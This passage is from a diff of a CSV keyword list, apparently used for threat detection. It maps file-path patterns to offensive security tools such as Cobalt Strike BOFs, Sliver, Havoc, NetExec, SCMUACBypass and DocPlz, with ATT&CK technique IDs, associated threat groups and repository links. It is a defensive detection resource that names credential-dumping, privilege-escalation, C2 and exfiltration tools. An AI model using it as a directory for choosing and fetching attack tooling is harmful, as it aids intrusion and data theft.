- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/sccmhunter*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" -"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/schtasksenum/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/scmuacbypass.cpp*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/scmuacbypass.exe*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" "*/SCMUACBypass.git*","offensive_tool_keyword","SCMUACBypass","SCM UAC Bypass","T1548.002 - T1088","TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/SCMUACBypass","1","1","N/A","8","1","57","9","2023-09-05T17:24:49Z","2023-09-04T13:11:17Z" @@ -5117,23 +5171,24 @@ "*/ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*/ScRunHex.py*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" "*/scshell*","offensive_tool_keyword","scshell","SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute)","T1071.001 - T1071.004 - T1046 - T1059 - T1024","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/scshell.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/searchsploit*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/Seatbelt.txt*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1572","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" +"*/Seatbelt/Commands*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*/SeBackupPrivilege.md*","offensive_tool_keyword","Priv2Admin","Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.","T1543 - T1068 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/gtworek/Priv2Admin","1","1","N/A","N/A","10","1573","243","2023-02-24T13:31:23Z","2019-08-14T11:50:17Z" "*/secinject.c*","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" -"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/SecretFinder.git*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*/secretsdump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/sec-tools/litefuzz*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*/SeeYouCM-Thief*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/self_delete.cna*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*/SeManageVolumeExploit.git*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" -"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*/SeriousSam.sln*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/server/c2/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*/server/common/stagers.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*/servers/dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/servers/smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" @@ -5145,24 +5200,25 @@ "*/ServerScanForWindows/PE*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/ServiceMove-BOF/*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/ServiceName:TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*/Services/TransitEXE.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" 